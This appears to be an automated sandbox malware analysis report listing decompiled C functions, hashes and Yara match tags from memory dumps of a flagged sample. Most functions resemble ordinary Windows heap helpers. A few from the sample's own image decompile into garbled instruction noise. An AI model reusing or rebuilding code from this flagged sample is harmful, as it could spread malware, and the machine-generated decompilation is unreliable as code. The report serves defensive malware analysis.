                                        0x01700b98
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01700b98
                                        0x016a4f3e
                                        0x016a4f48
                                        0x00000000
                                        0x016a4f6e
                                        0x00000000
                                        0x016a4f70

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 86aa357c70bd6d5554aacbbf363a2d61b4a6525cee4b8d1f4d96363454f327de
                                        • Instruction ID: 6547a9e46a0b378496feb4967d5aec9be88b2a807758ccd067286a327e52036a
                                        • Opcode Fuzzy Hash: 86aa357c70bd6d5554aacbbf363a2d61b4a6525cee4b8d1f4d96363454f327de
                                        • Instruction Fuzzy Hash: DFF0BE32525F84CFD773DB1CCD44B22F7D8AB006B8F445568E405879A2CB24EC40C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DA44B Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1797b9c; // 0x0
				_t15 = __ecx;
				_t16 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E016EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                        0x016da44b
                                        0x016da453
                                        0x016da472
                                        0x016da476
                                        0x00000000
                                        0x016da493
                                        0x016da47a
                                        0x016da47f
                                        0x016da486
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd5882a6026c2bb88600e5bde2cf13705001bed79af83e946f57dd7c132229ea
                                        • Instruction ID: 2e020f510a07c269bc17703895b58da3d2e2554d1e6512a63fea233e81864b01
                                        • Opcode Fuzzy Hash: bd5882a6026c2bb88600e5bde2cf13705001bed79af83e946f57dd7c132229ea
                                        • Instruction Fuzzy Hash: 74E09272A12421ABD2219A58ED00F6673AEDBE4A51F0A403DFA04C7214DA28DD02C7E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AF358 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E016AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E016DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L016C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                        0x016af35d
                                        0x016af361
                                        0x016af367
                                        0x016af372
                                        0x016af38c
                                        0x016af38c
                                        0x016af394

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                        • Instruction ID: 9815bd0aef6ba88c4d815a1e7876aa70314eca8ceda7d52e80842507542ab330
                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                        • Instruction Fuzzy Hash: 33E0DF32A40228FBDB31AAD99E05FAABFBDDB98A60F0101D9FA04D7150D9609E00C6D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041731A Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0041731A(void* __ebx, signed int* __edx) {
				signed char _t3;
				signed char _t5;

				asm("scasb");
				asm("int 0xa");
				_push(__edx);
				asm("stosd");
				_t5 = _t3;
				asm("insb");
				asm("fild qword [eax]");
				 *__edx =  *__edx | _t5;
				return _t5;
			}





                                        0x0041731b
                                        0x0041731d
                                        0x0041731f
                                        0x00417320
                                        0x00417321
                                        0x00417322
                                        0x00417329
                                        0x00417330
                                        0x0041733c

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3645f962cfcd3dbfb13725cdefc3a7d235bc66ad4ddc4b7ea03400e7386ce8a8
                                        • Instruction ID: 8c9a36d7994ce01adbfc0095581615dd7bfcc92d07168f78a5bd43b3028f87b8
                                        • Opcode Fuzzy Hash: 3645f962cfcd3dbfb13725cdefc3a7d235bc66ad4ddc4b7ea03400e7386ce8a8
                                        • Instruction Fuzzy Hash: A2D02287E99291088A02CCACB88C075FF60DE83039B2213CFCD44A78474402C10222CA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016BFF60 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x16811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E017788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E016C0050(_t14);
				}
			}










                                        0x016bff66
                                        0x016bff6b
                                        0x00000000
                                        0x016bff8f
                                        0x00000000
                                        0x016bff8f

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40c90a7b5be50a6f21d49497d20f51b0f3ab00c450b89f2ede51faa74f7dbcc8
                                        • Instruction ID: 75bebaa046d797ddc7bb8432b4c8fe6a7054a851f28501a2b22ce6eb4c7b939f
                                        • Opcode Fuzzy Hash: 40c90a7b5be50a6f21d49497d20f51b0f3ab00c450b89f2ede51faa74f7dbcc8
                                        • Instruction Fuzzy Hash: 03E065B06052049EDB259E5DDC84BA57B9CDB52721F1A819DE0084B223CB21D881C38A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017341E8 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E017341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x17808f0);
				_t5 = E016FD08C(__ebx, __edi, __esi);
				if( *0x17987ec == 0) {
					E016BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x17987ec == 0) {
						 *0x17987f0 = 0x17987ec;
						 *0x17987ec = 0x17987ec;
						 *0x17987e8 = 0x17987e4;
						 *0x17987e4 = 0x17987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01734248();
				}
				return E016FD0D1(_t5);
			}





                                        0x017341e8
                                        0x017341ea
                                        0x017341ef
                                        0x017341fb
                                        0x01734206
                                        0x0173420b
                                        0x01734216
                                        0x0173421d
                                        0x01734222
                                        0x0173422c
                                        0x01734231
                                        0x01734231
                                        0x01734236
                                        0x0173423d
                                        0x0173423d
                                        0x01734247

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8613ea45d83f2bc5f5c640526fc29de93b5d3b7f3f233aafc66ff049c16e525e
                                        • Instruction ID: a3a979c1f12d2df3d3f509a726aeb099885ff7a97c298c274620ccb3cb55f5c5
                                        • Opcode Fuzzy Hash: 8613ea45d83f2bc5f5c640526fc29de93b5d3b7f3f233aafc66ff049c16e525e
                                        • Instruction Fuzzy Hash: 0DF03278864709DFCBB0EFE9E90470CB6B5F796320F00812F9105972AAC73444AACF06
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175D380 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0175D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L016AE8B0(__ecx, _a4, 0xfff);
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                        0x0175d38a
                                        0x0175d39b
                                        0x0175d3b1
                                        0x00000000
                                        0x0175d3b6
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                        • Instruction ID: f64d80576ca308256680afba3958557964ffa7269a86844620f2b6df3d5689bb
                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                        • Instruction Fuzzy Hash: 23E0C231280209FBEB325E84CC00F79BB17DB50BA0F104035FE085A692C6B19C91DAD8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DA185 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x17967e4 >= 0xa) {
					if(_t5 < 0x1796800 || _t5 >= 0x1796900) {
						return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E016C0010(0x17967e0, _t5);
				}
			}





                                        0x016da190
                                        0x016da1a6
                                        0x016da1c2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016da192
                                        0x016da192
                                        0x016da19f
                                        0x016da19f

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80ffad86587f8f331d1b32ac7df8ebe72c8e1831b03e0146c24ad11c719912b4
                                        • Instruction ID: a714d05a880b61f6128e15ee0cfce4cedf5648453314a940117666527c3c1de7
                                        • Opcode Fuzzy Hash: 80ffad86587f8f331d1b32ac7df8ebe72c8e1831b03e0146c24ad11c719912b4
                                        • Instruction Fuzzy Hash: 12D02B7156800056CB2E2360AD14F353223F780BA1F34461CF2070B5A0E960C8DDD10C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D16E0 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E016D1710(0x17967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L016C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                        0x016d16e8
                                        0x016d16ef
                                        0x016d16f3
                                        0x016d16fe
                                        0x00000000
                                        0x016d1700
                                        0x016d170d
                                        0x016d170d
                                        0x016d16f2
                                        0x016d16f2
                                        0x016d16f2
                                        0x016d16f2

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49b369c5b4a41ec918eb50b29f374f2c818993ef39d62024a5c5e6f6124bf77c
                                        • Instruction ID: 23a2bb995bdeb8206f7e1cba14d2e8fb1f414252ac429e8b546f854ce1e5cb5a
                                        • Opcode Fuzzy Hash: 49b369c5b4a41ec918eb50b29f374f2c818993ef39d62024a5c5e6f6124bf77c
                                        • Instruction Fuzzy Hash: FED0A77110014192EE2D5B159C14B242662EB91B81F38006CF217495D0CFF0CC92E04C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00416CE8 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00416CE8(void* __eax, void* __ebx, void* __edx, void* __edi) {

				 *(__edi - 0x47) =  *(__edi - 0x47) | 0x000000a1;
				asm("arpl [esi-0x1d], bp");
				return __eax;
			}



                                        0x00416cea
                                        0x00416cef
                                        0x00416cfc

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c236d8022112054e8c86cf38dbed7f4d4c0a57f8d8d0601d7bbb32d221065ec5
                                        • Instruction ID: 52999429e9aac05e6a173bf50d827596504a78e5b1407a272d65d4c2de4b9197
                                        • Opcode Fuzzy Hash: c236d8022112054e8c86cf38dbed7f4d4c0a57f8d8d0601d7bbb32d221065ec5
                                        • Instruction Fuzzy Hash: 71C02B1BE195180062348F0C7C000F4F320F9C3235E10A7EBC858338804141D01402C9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D35A1 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E016BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                        0x016d35a1
                                        0x016d35a1
                                        0x016d35a5
                                        0x016d35ab
                                        0x016d35ab
                                        0x016d35b5
                                        0x00000000
                                        0x016d35c1
                                        0x016d35b7

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                        • Instruction ID: bf71dadbf6f806008e957cd3b12ca3d9b1cb8c16abffe2e9c893f75667b19f6b
                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                        • Instruction Fuzzy Hash: 82D0A9B1C011829AEB02AF14CE187A83BB2BB00208FD820A980060EB52C33A4A4AC706
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016BAAB0 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                        0x016baab6
                                        0x016baabb
                                        0x0170a442
                                        0x00000000
                                        0x0170a448
                                        0x0170a454
                                        0x0170a454
                                        0x016baac1
                                        0x016baac1
                                        0x016baac6
                                        0x016baac6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                        • Instruction ID: 8f4f67cf23e050bc6633ef9f678a3e839b00bc75db4352b7df5f7634935bc1d4
                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                        • Instruction Fuzzy Hash: 31D0E939752A80CFD617CB5DC994B5577A4BB44B84FC50490E901CB762E72CD984CA10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0172A537 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0172A537(intOrPtr _a4, intOrPtr _a8) {

				return L016C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                        0x0172a553

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction ID: 4d107108bae8e0c06c607253f9202f50f22896c688070af832b89be9fc70f2dd
                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                        • Instruction Fuzzy Hash: 45C01232040148BBCB126F81CC00F157B2AE754B60F004014B5040B5618532D970EA44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016ADB40 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L016C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                        0x016adb4d
                                        0x016adb54
                                        0x016adb5f
                                        0x016adb56
                                        0x016adb56
                                        0x016adb5c
                                        0x016adb5c

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction ID: e3675e7a2fa68d0852b68ce9a1b476792d4cf71f7005614c2dc7c47e7eab4afe
                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                        • Instruction Fuzzy Hash: ACC08C70280A01AAEB325F20CD01B103AA1BB10F01F8400A46301DA4F0DF78DC01EA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AAD30 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016AAD30(intOrPtr _a4) {

				return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                        0x016aad49

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction ID: 177b2a3863fa95651dbc4875d1bb53bf5cad1b6aea7c8410bb98e33aea60fbe4
                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                        • Instruction Fuzzy Hash: CAC08C32080248BBC7126A45CD00F217B2AE7A0B60F000024F6040A6618932E860D998
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016C3A1C Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016C3A1C(intOrPtr _a4) {
				void* _t5;

				return L016C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                        0x016c3a35

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                        • Instruction ID: 1588e4bdb3ab7cdf4b9b6e76f96f149b68c77d9297ce141097f884fa855c6e76
                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                        • Instruction Fuzzy Hash: 62C08C32080248BBC722AE42DC00F117B2AE7A0B60F000024B6040A5608932EC60D58C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016B76E2 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                        0x016b76e4
                                        0x00000000
                                        0x016b76f8
                                        0x016b76fd

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                        • Instruction ID: a7be6b5d6cd0ea817988559647aef952b43434db810ac63cd0e8e5e7ad0ca47a
                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                        • Instruction Fuzzy Hash: 32C08C701411C45AEB2A570CCE64B303A50AB48A08F48019CAA010D6E2D368AC42D708
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D36CC Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                        0x016d36d2
                                        0x016d36e8
                                        0x016d36d4
                                        0x016d36e5
                                        0x016d36e5

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                        • Instruction ID: e4a6e5c8037e89372504f9da7f10da7bef7593a8b5e761277cc6d29f6c1895b2
                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                        • Instruction Fuzzy Hash: 12C02BB0150480FBD7255F30CD10F247264F700E21F64035C7320856F0DE289C00D104
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016C7D50 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E016C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                        0x016c7d56
                                        0x016c7d5b
                                        0x016c7d60
                                        0x016c7d5d
                                        0x016c7d5d
                                        0x016c7d5d

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                        • Instruction ID: 828f3b36afda119705680053eff1d7d1135ed0551b8158dffe7da5524ad26bc7
                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                        • Instruction Fuzzy Hash: 71B092363019418FCE56DF18C480B2533E8FB44A40F8400D4E400CBA21D329E8008900
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9560 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b27dc1827710e0a9b31a8d86ab351dc3ac87ec62fbfe1494bac6f58fa7f5951a
                                        • Instruction ID: 96c0ddfb3abf6cbcdb23199ce74f861bd25907ba9dcf6a083967a3673c848ca3
                                        • Opcode Fuzzy Hash: b27dc1827710e0a9b31a8d86ab351dc3ac87ec62fbfe1494bac6f58fa7f5951a
                                        • Instruction Fuzzy Hash: 1A900265221000020145A9990A0560B0449B7D6391392C019F2406590CC66198657361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9950 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a491962f08dc77788405cc4224b782a4ee93318407d991ceba4a56e6310470b4
                                        • Instruction ID: 559db715167a41637866b17c3e2aa7f21aebcd9843aff0aeb4534b7ee3a9ffb7
                                        • Opcode Fuzzy Hash: a491962f08dc77788405cc4224b782a4ee93318407d991ceba4a56e6310470b4
                                        • Instruction Fuzzy Hash: 739002A120140403D14069994C057070009A7D0342F52C015A3054555ECA699C517175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
